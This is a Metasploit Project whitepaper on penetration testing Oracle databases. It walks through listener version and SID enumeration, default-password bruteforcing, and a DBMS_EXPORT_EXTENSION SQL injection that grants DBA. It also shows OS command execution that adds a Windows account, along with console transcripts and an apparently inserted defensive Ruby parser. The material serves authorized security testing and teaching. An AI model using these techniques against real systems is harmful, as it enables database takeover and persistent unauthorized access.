Oracle Penetration Testing Using the Metasploit Framework

Chris Gates & Mario Ceballos
Metasploit Project

Abstract

Over the years there have been tons of Oracle exploits, SQL Injection vulnerabilities, and post exploitation tricks and tools that had no order, methodology, or standardization, mainly just random .sql files. Additionally, none of the publicly available Pentest Frameworks have the ability to leverage built-in package SQL Injection vulnerabilities for privilege escalation, data extraction, or getting operating system access. In this whitepaper we will present an Oracle Pentesting Methodology and give you all the tools to break the "unbreakable" Oracle as Metasploit auxiliary modules. We've created version and SID enumeration modules, account bruteforcing modules, ported all the public (and not so public) Oracle SQL Injection vulnerabilities into SQLI modules (with IDS evasion examples for 10g/11g), modules for OS interaction, and modules for automating some of our post exploitation tasks. The modules are currently only supported under Linux and OSX.

Oracle Penetration Testing Methodology

1. Locate a system running Oracle.
2. Determine Oracle Version.
3. Determine Oracle SID.
4. Guess/Bruteforce USERNAME/PASS.
5. Privilege Escalation via SQL Injection.
6. Manipulate Data/Post Exploitation.
7. Cover Tracks.

Locating an Oracle System

You will typically find most Oracle installations by performing port scanning in the target netblock. The Oracle listener default port is 1521, but it can listen on any port, generally in the 1521-1540 range. You can also discover Oracle instances by scanning other common Oracle ports. Review http://www.red-database-security.com/whitepaper/oracle_default_ports.html for common Oracle ports.

Generally, running a service scan will NOT give you the Oracle TNS Listener version, but updated fingerprints for new versions of Nmap may yield versions in some situations.

    cg@attack:~$ nmap -sV 192.168.0.100-105 -p 1521

    Starting Nmap 4.85BETA8 ( http://nmap.org ) at 2009-06-18 15:25 EDT
    Interesting ports on 192.168.0.100:
    PORT     STATE SERVICE    VERSION
    1521/tcp open  oracle-tns Oracle TNS Listener

    Interesting ports on 192.168.0.101:
    PORT     STATE SERVICE    VERSION
    1521/tcp open  oracle-tns Oracle TNS Listener 9.2.0.1.0 (for 32-bit Windows)

You can also discover Oracle instances using search engines. Alex Kornbrust of Red-Database-Security has written two excellent whitepapers discussing this subject [1, 2].

[1] http://www.red-database-security.com/wp/google_oracle_hacking_us.pdf
[2] http://www.red-database-security.com/wp/yahoo_oracle_hacking_us.pdf

TNS and Oracle Mixins for Metasploit

Two new mixins have been added to the Metasploit Trunk. The first mixin is a TNS mixin that allows Metasploit to craft TNS packets. The second mixin is an Oracle mixin that allows us to use some additional libraries to wrap Oracle commands.

The TNS mixin is handy because it essentially replaces tnscmd.pl: you can pass any data you want inside the TNS packet.

    connect
    # Connect data is the payload of a TNS connect packet; here it asks the listener for its version.
    connect_data = "(CONNECT_DATA=(COMMAND=VERSION))"
    pkt = tns_packet(connect_data)
    sock.put(pkt)
    sock.get_once
    # Read the listener's reply (any length, 2 second timeout).
    res = sock.get_once(-1, 2)
    puts res
    disconnect

The Oracle mixin serves as the wrapper code for ruby-dbi, ruby-oci8, and the Oracle sqlplus client. It handles connecting to the remote database, sending SQL queries and disconnecting. The core of this functionality is found in the prepare_exec() method. This method connects to the database using DBI

    DBI.connect("DBI:OCI8://#{datastore['RHOST']}:#{datastore['RPORT']}/#{datastore['SID']}",
                "#{datastore['DBUSER']}", "#{datastore['DBPASS']}")

and then passes whatever data (SQL) you specify. The SQL is wrapped in a PL/SQL function: AUTHID CURRENT_USER makes it run with the caller's privileges, and the autonomous transaction lets the statement inside EXECUTE IMMEDIATE commit on its own.

    function = "CREATE OR REPLACE FUNCTION #{p} RETURN NUMBER AUTHID CURRENT_USER AS
      PRAGMA AUTONOMOUS_TRANSACTION;
      BEGIN
        EXECUTE IMMEDIATE '#{datastore['SQL']}';
        COMMIT;
        RETURN(0);
      END;"

    begin
      print_status("Sending function...")
      prepare_exec(function)
    end

Determine Oracle Version using Metasploit Modules

An Oracle version scanner using the TNS mixin has been added to the Metasploit trunk.

    msf auxiliary(tnslsnr_version) > info

           Name: Oracle tnslsnr Service Version Query.
        Version: 6479
        License: Metasploit Framework License (BSD)

    Provided by:
      CG

    Basic options:
      Name     Current Setting  Required  Description
      ----     ---------------  --------  -----------
      RHOSTS                    yes       The target address range or CIDR identifier
      RPORT    1521             yes       The target port
      THREADS  1                yes       The number of concurrent threads

    Description:
      This module simply queries the tnslsnr service for the Oracle build.

    msf auxiliary(tnslsnr_version) > set RHOSTS 192.168.0.100
    RHOSTS => 192.168.0.100
    msf auxiliary(tnslsnr_version) > run
    [*] Host 192.168.0.100 is running: 32-bit Windows: Version 10.2.0.1.0 - Production
    msf auxiliary(tnslsnr_version) > set RHOSTS 192.168.0.101
    RHOSTS => 192.168.0.101
    msf auxiliary(tnslsnr_version) > run
    [*] Host 192.168.0.101 is running: 32-bit Windows: Version 9.2.0.7.0 - Production
    msf auxiliary(tnslsnr_version) > set RHOSTS 192.168.0.102
    RHOSTS => 192.168.0.102
    msf auxiliary(tnslsnr_version) > run
    [*] Host 192.168.0.102 is running: Solaris: Version 10.2.0.1.0 - Production
    msf auxiliary(tnslsnr_version) > set RHOSTS 192.168.0.103
    RHOSTS => 192.168.0.103
    msf auxiliary(tnslsnr_version) > run
    [*] Host 192.168.0.103 is running: Linux: Version 11.1.0.6.0 - Production
    [*] Auxiliary module execution completed

Determine Oracle SID using Metasploit Modules

Oracle prior to 9.2.0.8 will just return the SID if requested. After 9.2.0.8, and for all newer versions of Oracle, you have to guess, bruteforce, or otherwise determine the SID.
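As an added example (not part of the whitepaper or of the Metasploit modules it describes), the Ruby below parses the tnslsnr_version output shown above and flags listeners older than 9.2.0.8, the ones the paper says hand out the SID on request, so a defender can prioritise them for patching or listener hardening. The sample output is constructed to match the module's printed format.

```ruby
# Added example, not from the whitepaper or the Metasploit modules it describes:
# parse the lines tnslsnr_version prints and flag listeners older than 9.2.0.8,
# which the paper notes will return the SID on request (no guessing needed).

# Constructed sample input in the shape of the module output shown above.
TNSLSNR_OUTPUT = <<~OUT
  [*] Host 192.168.0.100 is running: 32-bit Windows: Version 10.2.0.1.0 - Production
  [*] Host 192.168.0.101 is running: 32-bit Windows: Version 9.2.0.7.0 - Production
  [*] Host 192.168.0.102 is running: Solaris: Version 10.2.0.1.0 - Production
  [*] Host 192.168.0.103 is running: Linux: Version 11.1.0.6.0 - Production
  [*] Auxiliary module execution completed
OUT

# Per the paper, listeners before this release hand out the SID when asked.
SID_DISCLOSURE_FIXED_IN = [9, 2, 0, 8].freeze

HOST_LINE = /\A\[\*\] Host (?<host>\S+) is running: (?<platform>.+?): Version (?<version>[\d.]+)/

# Returns an array of {host:, platform:, version: [Integer, ...]} hashes;
# lines that are not "Host ... is running" lines are skipped.
def parse_tnslsnr_output(text)
  text.each_line.map { |line|
    m = HOST_LINE.match(line.strip)
    next unless m
    { host: m[:host], platform: m[:platform],
      version: m[:version].split('.').map(&:to_i) }
  }.compact
end

# Component-wise comparison; the shorter array is zero-padded so 9.2.0.8 == 9.2.0.8.0.
def version_before?(version, threshold)
  width = [version.size, threshold.size].max
  pad = ->(v) { v + [0] * (width - v.size) }
  (pad[version] <=> pad[threshold]) < 0
end

# Hosts whose listener predates 9.2.0.8 and therefore discloses the SID unauthenticated.
def sid_disclosing_hosts(text)
  parse_tnslsnr_output(text)
    .select { |h| version_before?(h[:version], SID_DISCLOSURE_FIXED_IN) }
    .map { |h| h[:host] }
end

if __FILE__ == $PROGRAM_NAME
  sid_disclosing_hosts(TNSLSNR_OUTPUT).each do |host|
    puts "#{host}: listener predates 9.2.0.8, SID can be enumerated without guessing"
  end
end
```

The same version gate applies to the Nmap banner earlier on the page (9.2.0.1.0 on 192.168.0.101), which is why the sid_enum run that follows succeeds against a 9.2.0.1.0 host.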
    [*] Host 192.168.0.105 is running: 32-bit Windows: Version 9.2.0.1.0 - Production
    msf > use auxiliary/scanner/oracle/sid_enum
    msf auxiliary(sid_enum) > set RHOSTS 192.168.0.105
    RHOSTS => 192.168.0.105
    msf auxiliary(sid_enum) > run
    [*] Identified SID for 192.168.0.105: PLSExtProc
    [*] Identified SID for 192.168.0.105: cyxt
    [*] Identified SERVICE_NAME for 192.168.0.105: PLSExtProc
    [*] Identified SERVICE_NAME for 192.168.0.105: cyxt
    [*] Identified SERVICE_NAME for 192.168.0.105: cyxtXDB
    [*] Auxiliary module execution completed

Bruteforcing the SID

We use the Service ID (SID) list from Red-Database-Security [3] and perform a dictionary attack.

[3] http://www.red-database-security.com/scripts/sid.txt

    msf auxiliary(sid_brute) > run
    [*] Starting brute force on 192.168.0.103, using sids from /home/cg/evil/msf3/dev/data/exploits/sid.txt...
    [*] Found SID 'ORCL' for host 192.168.0.103
    [*] Auxiliary module execution completed

Using other Oracle components to determine the SID

We can use other Oracle servlets and applications to learn the SID if they are available.

Enterprise Manager Console example:

    msf auxiliary(sid_enum) > run
    [-] TNS listener protected for 172.10.1.108...
    [*] Auxiliary module execution completed
    msf auxiliary(sid_enum) > use auxiliary/scanner/oracle/oas_sid
    msf auxiliary(oas_sid) > run
    [*] Discovered SID: 'orc10' for host 172.10.1.109
    [*] Auxiliary module execution completed
    msf auxiliary(oas_sid) >

Servlet /spy example:

    msf auxiliary(sid_enum) > run
    [-] TNS listener protected for 172.10.1.108...
    [*] Auxiliary module execution completed
    msf auxiliary(sid_enum) > use auxiliary/scanner/oracle/spy_sid
    msf auxiliary(spy_sid) > run
    [*] Discovered SID: 'orcl' for host 192.168.0.103
    [*] Auxiliary module execution completed
    msf auxiliary(spy_sid) >

Guess/Bruteforce USER/PASS

We use Pete Finnigan's default password list [4].

[4] http://www.petefinnigan.com/default/default_password_list.htm

    msf auxiliary(brute_login) > run
    ...
    [-] ORA-01017: invalid username/password; logon denied
    [-] ORA-01017: invalid username/password; logon denied
    [*] Auxiliary module execution completed
    msf auxiliary(brute_login) > db_notes
    [*] Time: Sat May 30 08:44:09 -0500 2009 Note: host=172.10.1.109 type=BRUTEFORCED_ACCOUNT data=SCOTT/TIGER

SQL Injection for Privilege Escalation

    msf > use auxiliary/sqli/oracle/dbms_export_extension
    msf auxiliary(dbms_export_extension) > info

           Name: SQL Injection via DBMS_EXPORT_EXTENSION.
        Version: $Revision: $

    Provided by:
      MC

    Basic options:
      Name    Current Setting     Required  Description
      ----    ---------------     --------  -----------
      SQL     GRANT DBA TO SCOTT  yes       SQL to run.
      DBPASS  TIGER               yes       The password to authenticate as.
      DBUSER  SCOTT               yes       The username to authenticate as.
      RHOST   127.0.0.1           yes       The Oracle host.
      RPORT   1521                yes       The TNS port.
      SID     DEMO                yes       The sid to authenticate with.

    Description:
      This module will escalate an Oracle DB user to DBA by exploiting an SQL injection bug in the DBMS_EXPORT_EXTENSION package.

    msf auxiliary(dbms_export_extension) > set RHOST 192.168.100.25
    RHOST => 192.168.100.25
    msf auxiliary(dbms_export_extension) > set SID UNLUCKY
    SID => UNLUCKY
    msf auxiliary(dbms_export_extension) > run
    [*] Sending package...
    [*] Done...
    [*] Sending body...
    [*] Done...
    [*] Sending declare...
    [*] Done...
    [*] Auxiliary module execution completed
    msf auxiliary(dbms_export_extension) >

Verify it worked:

    msf auxiliary(oracle_sql) > set SQL select * from user_role_privs
    SQL => select * from user_role_privs
    msf auxiliary(oracle_sql) > run
    [*] Sending SQL...
    [*] SCOTT,CONNECT,NO,YES,NO
    [*] SCOTT,DBA,NO,YES,NO

Post Exploitation

The primary module for post exploitation that will be released is the win32_exec module. This module creates a Java class to execute system commands, executes those commands, then deletes the class. Similar to this: http://www.0xdeadbeef.info/exploits/raptor_oraexec.sql. This technique is also discussed in the Oracle Hacker's Handbook by David Litchfield.

    msf auxiliary(win32exec) > set CMD "net user dba P@ssW0rd1234 /add"
    CMD => net user dba P@ssW0rd1234 /add
    msf auxiliary(win32exec) > run
    [*] Creating MSF JAVA class...
    [*] Done...
    [*] Creating MSF procedure...
    [*] Done...
    [*] Sending command: 'net user dba P@ssW0rd1234 /add'
    [*] Done...
    [*] Auxiliary module execution completed

Useful Sites for Oracle Hacking

http://www.red-database-security.com/
http://www.petefinnigan.com/
http://rawlab.mindcreations.com/
http://www.0xdeadbeef.info/
http://dsecrg.com/
http://www.databasesecurity.com/
http://www.davidlitchfield.com/security.htm
http://www.ngssoftware.com/research/
http://sourceforge.net/projects/inguma
http://www.oracleforensics.com/wordpress/

Dependency Installation Instructions

Oracle Mixin Install Notes for Linux - tested on Ubuntu 8.10 & 9.04

- start with a working version of metasploit trunk

    # install oracle instantclient
    # http://www.oracle.com/technology/software/tech/oci/instantclient/index.html
    # recommend instantclient 10, this should allow you to talk with 8, 9, 10, & 11 versions.

Grab
* Instant Client Package - Basic
* Instant Client Package - SDK
* Instant Client Package - SQL*Plus  ** not needed for metasploit but useful to have

-- unzip into /opt/oracle

    cg@segfault:~/$ cd /opt/oracle
    cg@segfault:/opt/oracle$ unzip /opt/oracle/oracle-instantclient-basic-10.2.0.4-1.i386.zip
    cg@segfault:/opt/oracle$ unzip /opt/oracle/oracle-instantclient-sqlplus-10.2.0.4-1.i386.zip
    cg@segfault:/opt/oracle$ unzip /opt/oracle/oracle-instantclient-devel-10.2.0.4-1.i386.zip

It will unzip everything into /opt/oracle/instantclient_10_2/. Create your symlink:

    cg@segfault:/opt/oracle/instantclient_10_2$ ln -s libclntsh.so.10.1 libclntsh.so

    # Set up your environment (.bashrc)
    export PATH=$PATH:/opt/oracle/instantclient_10_2
    export SQLPATH=/opt/oracle/instantclient_10_2
    export TNS_ADMIN=/opt/oracle/instantclient_10_2
    export LD_LIBRARY_PATH=/opt/oracle/instantclient_10_2
    export ORACLE_HOME=/opt/oracle/instantclient_10_2

    # Install ruby-dbi-0.1.1
    # http://rubyforge.org/projects/ruby-dbi/
    # http://rubyforge.org/frs/download.php/12368/dbi-0.1.1.tar.gz
    cg@segfault:~$ tar xvzf dbi-0.1.1.tar.gz
    cg@segfault:~$ cd ruby-dbi/
    (Hint: Cat the ../ruby-dbi/README file in another terminal for reference)
    cg@segfault:~/ruby-dbi$ ruby setup.rb config --with=dbi,dbd_pg
    cg@segfault:~/ruby-dbi$ ruby setup.rb setup
    cg@segfault:~/ruby-dbi$ sudo ruby setup.rb install

    # Install ruby-oci8-1.0.0
    # http://rubyforge.org/projects/ruby-oci8/
    # http://rubyforge.org/frs/download.php/28396/ruby-oci8-1.0.0.tar.gz
    cg@segfault:~$ tar xvzf ruby-oci8-1.0.0.tar.gz
    cg@segfault:~$ cd ruby-oci8-1.0.0/
    (Hint: Cat the ../ruby-oci8-1.0.0/README file in another terminal for reference)
    cg@segfault:~/ruby-oci8-1.0.0$ env
    cg@segfault:~/ruby-oci8-1.0.0$ LD_LIBRARY_PATH=/opt/oracle/instantclient_10_2/
    cg@segfault:~/ruby-oci8-1.0.0$ export LD_LIBRARY_PATH
    cg@segfault:~/ruby-oci8-1.0.0$ env | grep LD_LIBRARY_PATH
    cg@segfault:~/ruby-oci8-1.0.0$ make
    cg@segfault:~/ruby-oci8-1.0.0$ sudo make install

    # verify sqlplus works
    cg@segfault:~$ sqlplus

    SQL*Plus: Release 10.2.0.4.0 - Production on Sun May 3 12:24:51 2009

    Copyright (c) 1982, 2007, Oracle. All Rights Reserved.

    Enter user-name:

    # test the Oracle modules
    msf auxiliary(sql) > run
    [*] Sending SQL...
    [*] Oracle8i Enterprise Edition Release 8.1.7.0.0 - Production
    [*] PL/SQL Release 8.1.7.0.0 - Production
    [*] CORE 8.1.7.0.0 Production
    [*] TNS for Solaris: Version 8.1.7.0.0 - Production
    [*] NLSRTL Version 3.4.1.0.0 - Production
    [*] Done...
    [*] Auxiliary module execution completed
    msf auxiliary(sql) >
